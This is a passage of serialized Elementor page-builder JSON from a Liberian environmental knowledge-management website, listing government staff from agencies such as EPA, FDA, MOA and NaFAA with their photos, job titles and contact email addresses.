\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_JJ.jpg\",\"id\":2365},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/john-k-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/carlon.jpg\",\"id\":3385},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/kawusu-toure\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"caption_typography_typography\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4093e35\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"b1acda1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr.<\\/strong>\\n<p>Coordinator Climate Change Secretariat <\\/br>\\nEPA <\\/br>\\n<a href=\\\"mailto:jsokan@epa.gov.lr\\\">jsokan@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"9450b67\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0daecd0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John K. Jallah<\\/strong><br \\/>Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1bb41c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e4f745b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Daoda S. Carlon <\\/strong><br \\/>Assistant Manager, ESIA<br \\/>Department of Compliance and Enforcement<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:carlonbaindu@gmail.com\\\">carlonbaindu@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4031f43\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kn.png\",\"id\":3330}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/bgoll.jpg\",\"id\":3426}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Agricultural Economist<br \\/>MOA<br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jlopleh Dennis Wiagbe <\\/strong><br \\/>Director\\/M&amp;E<br \\/>MOA<br \\/><a href=\\\"mailto:jdmne12@gmail.com\\\">jdmne12@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Halala Willie Kokulo <\\/strong><br \\/>Director\\/Crop Resources<br \\/>MOA<br \\/><a href=\\\"mailto:kokulohalala@gmail.com\\\">kokulohalala@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"755c46b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"399f512\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"49c1380\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"4032246\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"2179c05\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7f527f1\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"713d262\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"d8cbd31\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"05b84b5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9540449\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Roosevelt Carlos Reeves <\\/strong><br \\/>Agricultural Mechanization Technologist<br \\/>MOA<br \\/><a href=\\\"mailto:rcreeves@gmail.com\\\">rcreeves@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cfc0f42\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"baed7dc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c5f9301\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b97200c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>Bureau of Industrial Services<br \\/>MOCI<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>S. Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>Department of Marine Fisheries and Environment<br \\/>NaFAA<br \\/><a href=\\\"sasherif@nafaa.gov.lr\\\">sasherif@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Anthony A. Yokie<\\/strong>\\nManager\\nDepartment of Marine Fisheries and Environment\\nNaFAA\\n<a href=\\\"mailto:ayokie@nafaa.gov.lr\\\">ayokie@nafaa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Martin Killen <\\/strong><br \\/>IT Officer<br \\/>NaFAA<br \\/><a href=\\\"mailto:maskillen@nafaa.gov.lr\\\">maskillen@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce W. Kumeh<\\/strong><br \\/>Coastal Zone Supervisor<br \\/>NaFAA<br \\/><a href=\\\"mailto:jkumeh@nafaa.gov.lr\\\">jkumeh@nafaa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"aca08f0\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"08c437c\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc69fab\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"625a74e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/02\\/nafaa.png\",\"id\":3520}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"aff1f4a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3690a1d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b216801\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"6cccf87\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6a59ec5\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23ca2d4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9bf0510\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Urias B. Barclay<\\/strong><br \\/>Environmental Technician<br \\/>NaFAA<br \\/><a href=\\\"mailto:ubbarclay@gmail.com\\\">ubbarclay@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a0aec03\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e162bb8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a9bce89\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"593819f\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3ef1bd5\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"334f9e9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br 